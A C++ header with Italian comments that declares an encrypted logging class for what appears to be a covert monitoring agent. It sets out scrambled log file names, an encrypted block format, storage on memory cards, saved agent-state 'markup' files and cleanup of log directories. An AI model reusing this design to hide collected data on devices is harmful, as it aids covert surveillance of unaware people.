#include "Common.h"
#include "Encryption.h"
#include "UberLog.h"
#include <exception>
#include <vector>
#include <string.h>
using namespace std;

#ifndef __Log_h__
#define __Log_h__

/*			LOG FORMAT
 *
 *  -- Naming Convention
 *	Il formato dei log e' il seguente:
 *	Il nome del file in chiaro ha questa forma: ID_AGENTE-LOG_TYPE-SEQUENCE.mob
 *	e si presenta cosi': xxxx-xxxx-dddd.mob
 *	Il primo gruppo e' formato generalmente da 4 cifre in esadecimali, il secondo
 *	e' formato generalmente da una cifra esadecimale, il terzo gruppo e' un numero
 *	di sequenza in formato decimale. Ognuno dei tre gruppi puo' essere composto da
 *	1 fino a 8 cifre. Il nome del file viene scramblato con il primo byte della
 *	chiave utilizzata per il challenge.
 *
 *	-- Header
 *	Il log cifrato e' cosi' composto:
 *	all'inizio del file viene scritta una LogStruct non cifrata, il membro FileSize indica la
 *	lunghezza complessiva di tutto il file. Dopo la LogStruct troviamo il filename in WCHAR, 
 *	quindi i byte di AdditionalData se presenti e poi il contenuto vero e proprio.
 *
 *	-- Data
 *	Il contenuto e' formato da una DWORD in chiaro che indica la dimensione del blocco
 *	unpadded (va quindi paddata a BLOCK_SIZE per ottenere la lunghezza del blocco cifrato)
 *	e poi il blocco di dati vero e proprio. Questa struttura puo' esser ripetuta fino alla
 *	fine del file.
 *
 *	-- Global Struct
 *	|Log Struct|FileName|AdditionalData|DWORD Unpadded|Block|.....|DWORD Unpadded|Block|.....|
 *
 *	Un log puo' essere composto sia da un unico blocco DWORD-Dati che da piu' blocchi DWORD-Dati.
 *
 */

class Log
{
	/**
	 * Indica il nome scramblato del file di log sul quale eseguire i vari metodi, va deallocato dal distruttore.
	 */
	private: WCHAR* wEncName;

	/**
	 * Rappresenta il nome in chiaro del file di log, va deallocato dal distruttore.
	 */
	private: WCHAR* wName;

	private: HANDLE hFile;
	private: Encryption *encryptionObj;
	private: UberLog *uberlogObj;
	private: UINT uLogSeq, uLogType;
	private: BOOL bStoredToMmc;

	/**
	 * Genera un nome gia' scramblato per un file log, se bAddPath e' TRUE il nome ritornato
	 * e' completo del path da utilizzare altrimenti viene ritornato soltanto il nome. Il buffer
	 * va liberato dal chiamante, se la chiamata fallisce la funzione torna NULL. Il nome generato
	 * non indica necessariamente un file che gia' non esiste sul filesystem, e' compito del chiamante
	 * verificare che tale file non sia gia' presente. Se il parametro facoltativo bStoreToMMC e'
	 * impostato a TRUE viene generato un nome che punta alla prima MMC disponibile, se esiste.
	 */
	private: WCHAR* MakeName(WCHAR *wName, BOOL bAddPath, BOOL bStoreToMMC = FALSE);

	 /**
	 * Override della funzione precedente: invece di generare il nome da una stringa lo genera
	 * da un numero. Il buffer va liberato dal chiamante, se la chiamata fallisce la funzione torna NULL.
	 */
	private: WCHAR* MakeName(UINT uAgentId, BOOL bAddPath);

	/**
	 * Questa funzione crea un file di log e lascia l'handle aperto. Il file viene creato con
	 * un nome casuale, la chiamata scrive l'header nel file e poi i dati addizionali se ce ne
	 * sono. LogType e' il tipo di log che stiamo scrivendo, pAdditionalData e' un puntatore agli eventuali
	 * additional data e uAdditionalLen e la lunghezza dei dati addizionali da scrivere nell'header. 
	 * Il parametro facoltativo bStoreToMMC se settato a TRUE fa in modo che il log venga salvato nella
	 * prima MMC disponibile, se non c'e' la chiama fallisce.
	 * La funzione torna TRUE se va a buon fine, FALSE altrimenti.
	 */
	public: BOOL CreateLog(UINT LogType, BYTE* pAdditionalData, UINT uAdditionalLen, BOOL bStoreToMMC = FALSE);

	/**
	 * Questa funzione prende i byte puntati da pByte, li cifra e li scrive nel file di log creato
	 * con CreateLog(). La funzione torna TRUE se va a buon fine, FALSE altrimenti.
	 */
	public: BOOL WriteLog(BYTE* pByte, UINT uLen);

	/**
	 * Chiude il file di log. Torna TRUE se il file e' stato chiuso con
	 * successo, FALSE altrimenti.
	 */
	public: BOOL CloseLog();

	/**
	 * Rimuove un file di log che ha come nome wLogName. Torna TRUE se la rimozione e' andata a buon fine,
	 * FALSE altrimenti.
	 */
	public: BOOL RemoveLog(WCHAR* wLogName);

	/**
	 * Scrive un file di markup per salvare lo stato dell'agente, i parametri utilizzati sono: l'ID dell'agente
	 * che sta generando il file, il puntatore al buffer dati e la lunghezza del buffer. Al termine della
	 * scrittura il file viene chiuso, non e' possibile fare alcuna Append e un'ulteriore chiamata alla
	 * WriteMarkup() comportera' la sovrascrittura del vecchio markup. La funzione torna TRUE se e' andata
	 * a buon fine, FALSE altrimenti. Il contenuto scritto e' cifrato.
	 */
	public: BOOL WriteMarkup(UINT uAgentId, BYTE *pData, UINT uLen);

	/**
	 * Legge il file di markup specificato da uAgentId (l'ID dell'agente che l'ha generato), torna un puntatore
	 * ai dati decifrati che va poi liberato dal chiamante e dentro uLen la lunghezza dei byte validi nel blocco. 
	 * Se il file non viene trovato o non e' possibile decifrarlo correttamente la funzione torna NULL.
	 */
	public: BYTE* ReadMarkup(UINT uAgentId, UINT *uLen);

	/**
	 * Torna TRUE se esiste un markup per l'agent uAgentId, altrimenti torna FALSE.
	 */
	public: BOOL IsMarkup(UINT uAgentId);

	/**
	 * Rimuove il file di markup relativo all'agente uAgentId. La funzione torna TRUE se il file e' stato
	 * rimosso o non e' stato trovato, FALSE se non e' stato possibile rimuoverlo.
	 */
	public: BOOL RemoveMarkup(UINT uAgentId);

	/**
	 * Rimuove tutti i file di markup presenti sul filesystem.
	 */
	public: void RemoveMarkups();
	 
	/**
	 * Rimuove le directory dei log dal sistema e dalla MMC.
	 */
	public: void RemoveLogDirs();

	Log();
	~Log();
};

#endif
